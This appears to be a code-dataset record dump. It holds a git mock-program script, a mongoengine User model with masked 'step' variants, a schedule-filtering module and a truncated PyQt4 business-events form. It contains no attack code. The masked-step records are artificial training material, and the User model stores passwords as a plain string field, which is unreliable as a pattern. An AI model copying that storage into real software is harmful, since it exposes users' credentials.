For\n# example, a couple of git commits might be simulated like:\n#\n# MOCK_PROGRAM_INPUT: log -1\n# MOCK_PROGRAM_RETURN: 0\n# MOCK_PROGRAM_OUTPUT: This is the summary line\n#\n# The is the body of the commit msg\n# MOCK_PROGRAM_INPUT: diff --name-only HEAD --not @{u}\n# MOCK_PROGRAM_RETURN: 0\n# MOCK_PROGRAM_OUTPUT: file_name_1.txt\n# file_name_2.txt\n# file_name_3.txt\n\n#\n\nimport sys\nimport os\n\ninputArgs = ' '.join(sys.argv[1:])\n#print(\"inputArgs = '\" + inputArgs + \"'\"\n\nif os.environ.get(\"MOCKPROGRAM_INOUT_FILE_OVERRIDE\"):\n mockProgramInOutFilePath=os.environ.get(\"MOCKPROGRAM_INOUT_FILE_OVERRIDE\")\nelse:\n mockProgramInOutFilePath='.mockprogram_inout.txt'\n\nif not os.path.exists(mockProgramInOutFilePath):\n print(\"Error: \"+mockProgramInOutFilePath+\" is missing!\")\n sys.exit(1)\n\nmockprogramInout = open(mockProgramInOutFilePath, 'r').read()\nmockprogramInoutArray = mockprogramInout.splitlines()\nif len(mockprogramInoutArray) and mockprogramInoutArray[-1] == \"\":\n mockprogramInoutArray = mockprogramInoutArray[:-1]\n\nif len(mockprogramInoutArray) < 3:\n print(\"Error: \"+mockProgramInOutFilePath+\" has less than three lines:\\n\"\n \"-------------\\n\" + mockprogramInout + \"-------------\")\n sys.exit(2)\n\n# Assert input\nexpectedInputLine = mockprogramInoutArray[0]\nif expectedInputLine.find(\"MOCK_PROGRAM_INPUT:\") != 0:\n print(\"Error, first line = '\" + expectedInputLine + \"', does not match \"\n \"^MOCK_PROGRAM_INPUT:\") \n sys.exit(3)\nexpectedInput = expectedInputLine.replace(\"MOCK_PROGRAM_INPUT:\", \"\").strip()\nif inputArgs != expectedInput:\n print(\"Error, input args='\" + inputArgs + \"' does not match expected='\" +\n expectedInput + \"'\")\n sys.exit(4)\n\n# Get return code\nreturnCodeLine = mockprogramInoutArray[1]\nif returnCodeLine.find(\"MOCK_PROGRAM_RETURN:\") != 0:\n print(\"Error, second line = '\" + returnCodeLine + \"', does not match \"\n \"^MOCK_PROGRAM_RETURN:\") \n sys.exit(5)\nreturnCode = returnCodeLine.replace(\"MOCK_PROGRAM_RETURN:\", \"\").strip()\n\n# Get output (can be multi-line)\noutputLine = mockprogramInoutArray[2]\nif outputLine.find(\"MOCK_PROGRAM_OUTPUT:\") != 0:\n print(\"Error, third line = '\" + outputLine + \"', does not match \"\n \"^MOCK_PROGRAM_OUTPUT:\") \n sys.exit(6)\noutputStr = outputLine.replace(\"MOCK_PROGRAM_OUTPUT: \", \"\")\nnumLinesOuput = 1\nif len(mockprogramInoutArray) > 3:\n for line in mockprogramInoutArray[3:]:\n if line.find(\"MOCK_PROGRAM_INPUT:\") == 0:\n break\n outputStr = outputStr+\"\\n\"+line\n numLinesOuput = numLinesOuput + 1\nprint(outputStr)\n\n# Write the remaining lines back into the file\nlineLineIndex = 2 + numLinesOuput\nif len(mockprogramInoutArray) > lineLineIndex:\n open(mockProgramInOutFilePath, 'w').write(\n ('\\n'.join(mockprogramInoutArray[lineLineIndex:]))+\"\\n\" )\nelse:\n open(mockProgramInOutFilePath, 'w').write(\"\")\n\n# Return exit code\nsys.exit(int(returnCode))\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
USERS MODEL
"""
from www import app
import mongoengine
import datetime
class User(mongoengine.Document):
username = mongoengine.StringField(required=True)
password = mongoengine.StringField(required=True)
email = mongoengine.StringField(required=True)
active_hash = mongoengine.StringField(required=False, default=None)
active_hash_expires = mongoengine.DateTimeField(required=False,
default=None)
recover_hash = mongoengine.StringField(required=False)
recover_hash_expires = mongoengine.DateTimeField(required=False)
active = mongoengine.BooleanField(required=True, default=False)
locked = mongoengine.BooleanField(required=True, default=True) # locked changes depending on user active or not
first_name = mongoengine.StringField(required=False)
last_name = mongoengine.StringField(required=False)
show_as = mongoengine.StringField(required=False)
date_of_birth = mongoengine.DateTimeField(required=False)
created_at = mongoengine.DateTimeField(required=True, default=datetime.datetime.utcnow())
updated_at = mongoengine.DateTimeField(required=False, default=datetime.datetime.utcnow())
meta = {
'db_alias': app.config["DEFAULT_DATABASE_ALIAS"],
'collection': 'users',
}
@classmethod
def pre_save(cls, sender, document, **kwargs):
document.updated_at = datetime.datetime.utcnow()
mongoengine.signals.pre_save.connect(User.pre_save, sender=User)
|
normal
|
{
"blob_id": "51cdb41836415c08609ee6a6bcc3adbaf2533da4",
"index": 3697,
"step-1": "<mask token>\n\n\nclass User(mongoengine.Document):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def pre_save(cls, sender, document, **kwargs):\n document.updated_at = datetime.datetime.utcnow()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass User(mongoengine.Document):\n username = mongoengine.StringField(required=True)\n password = mongoengine.StringField(required=True)\n email = mongoengine.StringField(required=True)\n active_hash = mongoengine.StringField(required=False, default=None)\n active_hash_expires = mongoengine.DateTimeField(required=False, default\n =None)\n recover_hash = mongoengine.StringField(required=False)\n recover_hash_expires = mongoengine.DateTimeField(required=False)\n active = mongoengine.BooleanField(required=True, default=False)\n locked = mongoengine.BooleanField(required=True, default=True)\n first_name = mongoengine.StringField(required=False)\n last_name = mongoengine.StringField(required=False)\n show_as = mongoengine.StringField(required=False)\n date_of_birth = mongoengine.DateTimeField(required=False)\n created_at = mongoengine.DateTimeField(required=True, default=datetime.\n datetime.utcnow())\n updated_at = mongoengine.DateTimeField(required=False, default=datetime\n .datetime.utcnow())\n meta = {'db_alias': app.config['DEFAULT_DATABASE_ALIAS'], 'collection':\n 'users'}\n\n @classmethod\n def pre_save(cls, sender, document, **kwargs):\n document.updated_at = datetime.datetime.utcnow()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass User(mongoengine.Document):\n username = mongoengine.StringField(required=True)\n password = mongoengine.StringField(required=True)\n email = mongoengine.StringField(required=True)\n active_hash = mongoengine.StringField(required=False, default=None)\n active_hash_expires = mongoengine.DateTimeField(required=False, default\n =None)\n recover_hash = mongoengine.StringField(required=False)\n recover_hash_expires = mongoengine.DateTimeField(required=False)\n active = mongoengine.BooleanField(required=True, default=False)\n locked = mongoengine.BooleanField(required=True, default=True)\n first_name = mongoengine.StringField(required=False)\n last_name = mongoengine.StringField(required=False)\n show_as = mongoengine.StringField(required=False)\n date_of_birth = mongoengine.DateTimeField(required=False)\n created_at = mongoengine.DateTimeField(required=True, default=datetime.\n datetime.utcnow())\n updated_at = mongoengine.DateTimeField(required=False, default=datetime\n .datetime.utcnow())\n meta = {'db_alias': app.config['DEFAULT_DATABASE_ALIAS'], 'collection':\n 'users'}\n\n @classmethod\n def pre_save(cls, sender, document, **kwargs):\n document.updated_at = datetime.datetime.utcnow()\n\n\nmongoengine.signals.pre_save.connect(User.pre_save, sender=User)\n",
"step-4": "<mask token>\nfrom www import app\nimport mongoengine\nimport datetime\n\n\nclass User(mongoengine.Document):\n username = mongoengine.StringField(required=True)\n password = mongoengine.StringField(required=True)\n email = mongoengine.StringField(required=True)\n active_hash = mongoengine.StringField(required=False, default=None)\n active_hash_expires = mongoengine.DateTimeField(required=False, default\n =None)\n recover_hash = mongoengine.StringField(required=False)\n recover_hash_expires = mongoengine.DateTimeField(required=False)\n active = mongoengine.BooleanField(required=True, default=False)\n locked = mongoengine.BooleanField(required=True, default=True)\n first_name = mongoengine.StringField(required=False)\n last_name = mongoengine.StringField(required=False)\n show_as = mongoengine.StringField(required=False)\n date_of_birth = mongoengine.DateTimeField(required=False)\n created_at = mongoengine.DateTimeField(required=True, default=datetime.\n datetime.utcnow())\n updated_at = mongoengine.DateTimeField(required=False, default=datetime\n .datetime.utcnow())\n meta = {'db_alias': app.config['DEFAULT_DATABASE_ALIAS'], 'collection':\n 'users'}\n\n @classmethod\n def pre_save(cls, sender, document, **kwargs):\n document.updated_at = datetime.datetime.utcnow()\n\n\nmongoengine.signals.pre_save.connect(User.pre_save, sender=User)\n",
"step-5": "\"\"\"\n USERS MODEL\n\"\"\"\n\nfrom www import app\nimport mongoengine\nimport datetime\n\n\nclass User(mongoengine.Document):\n username = mongoengine.StringField(required=True)\n password = mongoengine.StringField(required=True)\n email = mongoengine.StringField(required=True)\n\n active_hash = mongoengine.StringField(required=False, default=None)\n active_hash_expires = mongoengine.DateTimeField(required=False,\n default=None)\n\n recover_hash = mongoengine.StringField(required=False)\n recover_hash_expires = mongoengine.DateTimeField(required=False)\n\n active = mongoengine.BooleanField(required=True, default=False)\n locked = mongoengine.BooleanField(required=True, default=True) # locked changes depending on user active or not\n\n first_name = mongoengine.StringField(required=False)\n last_name = mongoengine.StringField(required=False)\n show_as = mongoengine.StringField(required=False)\n date_of_birth = mongoengine.DateTimeField(required=False)\n\n created_at = mongoengine.DateTimeField(required=True, default=datetime.datetime.utcnow())\n updated_at = mongoengine.DateTimeField(required=False, default=datetime.datetime.utcnow())\n\n meta = {\n 'db_alias': app.config[\"DEFAULT_DATABASE_ALIAS\"],\n 'collection': 'users',\n }\n\n @classmethod\n def pre_save(cls, sender, document, **kwargs):\n document.updated_at = datetime.datetime.utcnow()\n\n\nmongoengine.signals.pre_save.connect(User.pre_save, sender=User)\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
from dateutil import parser
from datetime import datetime
from backend.crawler import calender_crawler
from backend.logic.schedule_by_time.schedule_utils import get_weeks_of_subject
from backend.logic.schedule_by_time.schedule_utils import get_time_str
# e.g. hôm nay, hôm qua, ngày mai, thứ 2, thứ tư, chủ nhật, thứ năm tuần trước, thứ bảy tuần này, 04-06-2020, 10/06/2020 ....
def filter_by_weekday(schedule_table, time_entity):
time_str = get_time_str(time_entity)
time = parser.parse(time_str)
weekday = time.weekday() + 2
schedule = []
for row in schedule_table:
weekday_of_subject = int(row['time'].split(',')[0].split(' ')[1].strip())
weeks_of_subject = get_weeks_of_subject(row)
week_now = int(calender_crawler.crawl_callender()[1])
if (weekday_of_subject == weekday) and (week_now in weeks_of_subject):
schedule.append(row)
return schedule
# e.g. sáng mai, tối hôm qua, chiều hôm nay, sáng thứ 4 tuần này, chiều thứ 5 tuần sau, ....
def filter_by_session(schedule_table, time_entity):
subjects_of_day = filter_by_weekday(schedule_table, time_entity)
start_session_hour = parser.parse(time_entity['value']['from']).hour
schedule = []
for subject in subjects_of_day:
subject_start_time = int(subject['time'].split(',')[1].split('-')[0].split('h')[0].strip())
if (start_session_hour == 4) and (subject_start_time >= 12): # morning
continue
if (start_session_hour == 12) and (subject_start_time < 12): # afternoon
continue
if(start_session_hour == 18) and (subject_start_time < 18): # evening
continue
schedule.append(subject)
return schedule
# e.g. 9 giờ sáng mai, 7 giờ tối hôm qua, 4 giờ chiều thứ 2, ....
def filter_by_hour(schedule_table, time_entity):
subjects_of_day = filter_by_weekday(schedule_table, time_entity)
schedule = []
hour = parser.parse(get_time_str(time_entity)).hour
for subject in subjects_of_day:
subject_start_hour = int(subject['time'].split(',')[1].split('-')[0].split('h')[0].strip())
subject_end_hour = int(subject['time'].split(',')[1].split('-')[1].split('h')[0].strip())
if subject_start_hour <= hour <= subject_end_hour:
schedule.append(subject)
return schedule
# e.g. tuần sau, tuần trước, tuần này, ....
def filter_by_week(schedule_table, time_entity):
schedule = []
for row in schedule_table:
weeks_of_subject = get_weeks_of_subject(row)
week_now = int(calender_crawler.crawl_callender()[1])
if week_now in weeks_of_subject:
schedule.append(row)
return schedule
# e.g. tháng 3, tháng sau, tháng trước ....
def filter_by_month(schedule_table, time_entity):
return schedule_table
def filter_by_year(schedule_table, time_entity):
return schedule_table
def filter_by_multi_week(schedule_table, time_entity):
return schedule_table
def filter_by_multi_month(schedule_table, time_entity):
return schedule_table
def check_out_of_semester(time_entity):
time_str = get_time_str(time_entity)
date_str = time_str.split('T')[0]
date_ask = datetime.strptime(date_str, '%Y-%m-%d')
today = datetime.now()
diff_days = (date_ask - today).days
diff_weeks = diff_days // 7
semester_now = calender_crawler.crawl_callender()[0]
week_now = int(calender_crawler.crawl_callender()[1])
week_asked = week_now + diff_weeks
if (semester_now[4] == '1') and (week_asked > 25 or week_asked < 0): # 20191, 20201, 20211....
return True
if (semester_now[4] == '2') and (week_asked <= 25 or week_asked > 50):
return True
return False
|
normal
|
{
"blob_id": "6339f5c980ab0c0fb778870196493ddd83963ae7",
"index": 9203,
"step-1": "<mask token>\n\n\ndef filter_by_session(schedule_table, time_entity):\n subjects_of_day = filter_by_weekday(schedule_table, time_entity)\n start_session_hour = parser.parse(time_entity['value']['from']).hour\n schedule = []\n for subject in subjects_of_day:\n subject_start_time = int(subject['time'].split(',')[1].split('-')[0\n ].split('h')[0].strip())\n if start_session_hour == 4 and subject_start_time >= 12:\n continue\n if start_session_hour == 12 and subject_start_time < 12:\n continue\n if start_session_hour == 18 and subject_start_time < 18:\n continue\n schedule.append(subject)\n return schedule\n\n\n<mask token>\n\n\ndef filter_by_week(schedule_table, time_entity):\n schedule = []\n for row in schedule_table:\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\ndef filter_by_month(schedule_table, time_entity):\n return schedule_table\n\n\n<mask token>\n\n\ndef filter_by_multi_week(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_multi_month(schedule_table, time_entity):\n return schedule_table\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef filter_by_weekday(schedule_table, time_entity):\n time_str = get_time_str(time_entity)\n time = parser.parse(time_str)\n weekday = time.weekday() + 2\n schedule = []\n for row in schedule_table:\n weekday_of_subject = int(row['time'].split(',')[0].split(' ')[1].\n strip())\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if weekday_of_subject == weekday and week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\ndef filter_by_session(schedule_table, time_entity):\n subjects_of_day = filter_by_weekday(schedule_table, time_entity)\n start_session_hour = parser.parse(time_entity['value']['from']).hour\n schedule = []\n for subject in subjects_of_day:\n subject_start_time = int(subject['time'].split(',')[1].split('-')[0\n ].split('h')[0].strip())\n if start_session_hour == 4 and subject_start_time >= 12:\n continue\n if start_session_hour == 12 and subject_start_time < 12:\n continue\n if start_session_hour == 18 and subject_start_time < 18:\n continue\n schedule.append(subject)\n return schedule\n\n\n<mask token>\n\n\ndef filter_by_week(schedule_table, time_entity):\n schedule = []\n for row in schedule_table:\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\ndef filter_by_month(schedule_table, time_entity):\n return schedule_table\n\n\n<mask token>\n\n\ndef filter_by_multi_week(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_multi_month(schedule_table, time_entity):\n return schedule_table\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef filter_by_weekday(schedule_table, time_entity):\n time_str = get_time_str(time_entity)\n time = parser.parse(time_str)\n weekday = time.weekday() + 2\n schedule = []\n for row in schedule_table:\n weekday_of_subject = int(row['time'].split(',')[0].split(' ')[1].\n strip())\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if weekday_of_subject == weekday and week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\ndef filter_by_session(schedule_table, time_entity):\n subjects_of_day = filter_by_weekday(schedule_table, time_entity)\n start_session_hour = parser.parse(time_entity['value']['from']).hour\n schedule = []\n for subject in subjects_of_day:\n subject_start_time = int(subject['time'].split(',')[1].split('-')[0\n ].split('h')[0].strip())\n if start_session_hour == 4 and subject_start_time >= 12:\n continue\n if start_session_hour == 12 and subject_start_time < 12:\n continue\n if start_session_hour == 18 and subject_start_time < 18:\n continue\n schedule.append(subject)\n return schedule\n\n\n<mask token>\n\n\ndef filter_by_week(schedule_table, time_entity):\n schedule = []\n for row in schedule_table:\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\ndef filter_by_month(schedule_table, time_entity):\n return schedule_table\n\n\n<mask token>\n\n\ndef filter_by_multi_week(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_multi_month(schedule_table, time_entity):\n return schedule_table\n\n\ndef check_out_of_semester(time_entity):\n time_str = get_time_str(time_entity)\n date_str = time_str.split('T')[0]\n date_ask = datetime.strptime(date_str, '%Y-%m-%d')\n today = datetime.now()\n diff_days = (date_ask - today).days\n diff_weeks = diff_days // 7\n semester_now = calender_crawler.crawl_callender()[0]\n week_now = int(calender_crawler.crawl_callender()[1])\n week_asked = week_now + diff_weeks\n if semester_now[4] == '1' and (week_asked > 25 or week_asked < 0):\n return True\n if semester_now[4] == '2' and (week_asked <= 25 or week_asked > 50):\n return True\n return False\n",
"step-4": "from dateutil import parser\nfrom datetime import datetime\nfrom backend.crawler import calender_crawler\nfrom backend.logic.schedule_by_time.schedule_utils import get_weeks_of_subject\nfrom backend.logic.schedule_by_time.schedule_utils import get_time_str\n\n\ndef filter_by_weekday(schedule_table, time_entity):\n time_str = get_time_str(time_entity)\n time = parser.parse(time_str)\n weekday = time.weekday() + 2\n schedule = []\n for row in schedule_table:\n weekday_of_subject = int(row['time'].split(',')[0].split(' ')[1].\n strip())\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if weekday_of_subject == weekday and week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\ndef filter_by_session(schedule_table, time_entity):\n subjects_of_day = filter_by_weekday(schedule_table, time_entity)\n start_session_hour = parser.parse(time_entity['value']['from']).hour\n schedule = []\n for subject in subjects_of_day:\n subject_start_time = int(subject['time'].split(',')[1].split('-')[0\n ].split('h')[0].strip())\n if start_session_hour == 4 and subject_start_time >= 12:\n continue\n if start_session_hour == 12 and subject_start_time < 12:\n continue\n if start_session_hour == 18 and subject_start_time < 18:\n continue\n schedule.append(subject)\n return schedule\n\n\ndef filter_by_hour(schedule_table, time_entity):\n subjects_of_day = filter_by_weekday(schedule_table, time_entity)\n schedule = []\n hour = parser.parse(get_time_str(time_entity)).hour\n for subject in subjects_of_day:\n subject_start_hour = int(subject['time'].split(',')[1].split('-')[0\n ].split('h')[0].strip())\n subject_end_hour = int(subject['time'].split(',')[1].split('-')[1].\n split('h')[0].strip())\n if subject_start_hour <= hour <= subject_end_hour:\n schedule.append(subject)\n return schedule\n\n\ndef filter_by_week(schedule_table, time_entity):\n schedule = []\n for row in schedule_table:\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\ndef filter_by_month(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_year(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_multi_week(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_multi_month(schedule_table, time_entity):\n return schedule_table\n\n\ndef check_out_of_semester(time_entity):\n time_str = get_time_str(time_entity)\n date_str = time_str.split('T')[0]\n date_ask = datetime.strptime(date_str, '%Y-%m-%d')\n today = datetime.now()\n diff_days = (date_ask - today).days\n diff_weeks = diff_days // 7\n semester_now = calender_crawler.crawl_callender()[0]\n week_now = int(calender_crawler.crawl_callender()[1])\n week_asked = week_now + diff_weeks\n if semester_now[4] == '1' and (week_asked > 25 or week_asked < 0):\n return True\n if semester_now[4] == '2' and (week_asked <= 25 or week_asked > 50):\n return True\n return False\n",
"step-5": "from dateutil import parser\nfrom datetime import datetime\n\nfrom backend.crawler import calender_crawler\nfrom backend.logic.schedule_by_time.schedule_utils import get_weeks_of_subject\nfrom backend.logic.schedule_by_time.schedule_utils import get_time_str\n\n\n# e.g. hôm nay, hôm qua, ngày mai, thứ 2, thứ tư, chủ nhật, thứ năm tuần trước, thứ bảy tuần này, 04-06-2020, 10/06/2020 ....\ndef filter_by_weekday(schedule_table, time_entity):\n time_str = get_time_str(time_entity)\n time = parser.parse(time_str)\n weekday = time.weekday() + 2\n\n schedule = []\n for row in schedule_table:\n weekday_of_subject = int(row['time'].split(',')[0].split(' ')[1].strip())\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if (weekday_of_subject == weekday) and (week_now in weeks_of_subject):\n schedule.append(row)\n return schedule\n\n\n# e.g. sáng mai, tối hôm qua, chiều hôm nay, sáng thứ 4 tuần này, chiều thứ 5 tuần sau, ....\ndef filter_by_session(schedule_table, time_entity):\n subjects_of_day = filter_by_weekday(schedule_table, time_entity)\n start_session_hour = parser.parse(time_entity['value']['from']).hour\n schedule = []\n for subject in subjects_of_day:\n subject_start_time = int(subject['time'].split(',')[1].split('-')[0].split('h')[0].strip())\n if (start_session_hour == 4) and (subject_start_time >= 12): # morning\n continue\n if (start_session_hour == 12) and (subject_start_time < 12): # afternoon\n continue\n if(start_session_hour == 18) and (subject_start_time < 18): # evening\n continue\n schedule.append(subject)\n return schedule\n \n\n# e.g. 9 giờ sáng mai, 7 giờ tối hôm qua, 4 giờ chiều thứ 2, ....\ndef filter_by_hour(schedule_table, time_entity):\n subjects_of_day = filter_by_weekday(schedule_table, time_entity)\n schedule = []\n hour = parser.parse(get_time_str(time_entity)).hour\n for subject in subjects_of_day:\n subject_start_hour = int(subject['time'].split(',')[1].split('-')[0].split('h')[0].strip())\n subject_end_hour = int(subject['time'].split(',')[1].split('-')[1].split('h')[0].strip())\n if subject_start_hour <= hour <= subject_end_hour:\n schedule.append(subject)\n return schedule\n\n\n# e.g. tuần sau, tuần trước, tuần này, ....\ndef filter_by_week(schedule_table, time_entity):\n schedule = []\n for row in schedule_table:\n weeks_of_subject = get_weeks_of_subject(row)\n week_now = int(calender_crawler.crawl_callender()[1])\n if week_now in weeks_of_subject:\n schedule.append(row)\n return schedule\n\n\n# e.g. tháng 3, tháng sau, tháng trước ....\ndef filter_by_month(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_year(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_multi_week(schedule_table, time_entity):\n return schedule_table\n\n\ndef filter_by_multi_month(schedule_table, time_entity):\n return schedule_table\n\n\ndef check_out_of_semester(time_entity):\n time_str = get_time_str(time_entity)\n date_str = time_str.split('T')[0]\n date_ask = datetime.strptime(date_str, '%Y-%m-%d')\n today = datetime.now()\n diff_days = (date_ask - today).days\n diff_weeks = diff_days // 7\n semester_now = calender_crawler.crawl_callender()[0]\n week_now = int(calender_crawler.crawl_callender()[1])\n week_asked = week_now + diff_weeks\n if (semester_now[4] == '1') and (week_asked > 25 or week_asked < 0): # 20191, 20201, 20211....\n return True\n if (semester_now[4] == '2') and (week_asked <= 25 or week_asked > 50):\n return True\n return False\n \n",
"step-ids": [
5,
6,
7,
10,
11
]
}
|
[
5,
6,
7,
10,
11
] |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'KPS_RevisitBusinessEvents.ui'
#
# Created: Sun May 18 14:50:49 2014
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui, QtSql
import sqlite3
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(666, 538)
palette = QtGui.QPalette()
self.eventSkip = 0;
self.db = Database()
brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
self.inWork = True
brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(8, 129, 2))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
Form.setPalette(palette)
self.tb_EventViewer = QtGui.QTableView(Form)
self.tb_EventViewer.setGeometry(QtCore.QRect(60, 120, 531, 351))
self.tb_EventViewer.setObjectName(_fromUtf8("tb_EventViewer"))
self.tb_EventViewer.horizontalHeader().setVisible(False)
self.tb_EventViewer.verticalHeader().setVisible(False)
# self.tb_EventViewer.setColumnCount(0)
# self.tb_EventViewer.setRowCount(0)
self.bt_Earlier = QtGui.QPushButton(Form)
self.bt_Earlier.setGeometry(QtCore.QRect(60, 90, 75, 23))
self.bt_Earlier.setObjectName(_fromUtf8("bt_Earlier"))
self.bt_Earlier.clicked.connect(self.clicked_bt_Earlier)
self.bt_Later = QtGui.QPushButton(Form)
self.bt_Later.setGeometry(QtCore.QRect(510, 90, 75, 23))
self.bt_Later.setObjectName(_fromUtf8("bt_Later"))
self.bt_Later.clicked.connect(self.clicked_bt_Later)
self.label = QtGui.QLabel(Form)
self.label.setGeometry(QtCore.QRect(70, 0, 511, 41))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.label.setPalette(palette)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Segoe UI Light"))
font.setPointSize(18)
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("label"))
self.cb_EventType = QtGui.QComboBox(Form)
self.cb_EventType.setGeometry(QtCore.QRect(230, 50, 221, 22))
self.cb_EventType.setObjectName(_fromUtf8("cb_EventType"))
self.cb_EventType.currentIndexChanged['QString'].connect(self.handleChanged)
self.label_2 = QtGui.QLabel(Form)
self.label_2.setGeometry(QtCore.QRect(70, 50, 121, 21))
self.label_3 = QtGui.QLabel(Form)
self.label_3.setGeometry(QtCore.QRect(190, 90, 221, 21))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(120, 120, 120))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
self.label_2.setPalette(palette)
self.label_3.setPalette(palette)
font = QtGui.QFont()
font.setFamily(_fromUtf8("Segoe UI"))
font.setPointSize(12)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.label_3.setFont(font)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
self.initialize()
def retranslateUi(self, Form):
Form.setWindowTitle(_translate("Form", "Revisit business events", None))
self.bt_Earlier.setText(_translate("Form", "<<", None))
self.bt_Later.setText(_translate("Form", ">>", None))
self.label.setText(_translate("Form", "Revisit business events", None))
self.label_2.setText(_translate("Form", "Select Event Type", None))
def initialize(self):
self.cb_EventType.addItems(self.getBusinessEventsType())
# self.cb_Destination.addItems(RH.getLocations())
def getBusinessEventsType(self):
conn = sqlite3.connect("../Database/Business.db")
conn.text_factory = str
c = conn.cursor()
c.execute('SELECT Event FROM EventTypes')
locs = [r[0] for r in c.fetchall()]
conn.close()
return locs
def handleChanged(self, text):
modelView = QtGui.QStandardItemModel()
query = QtSql.QSqlQuery()
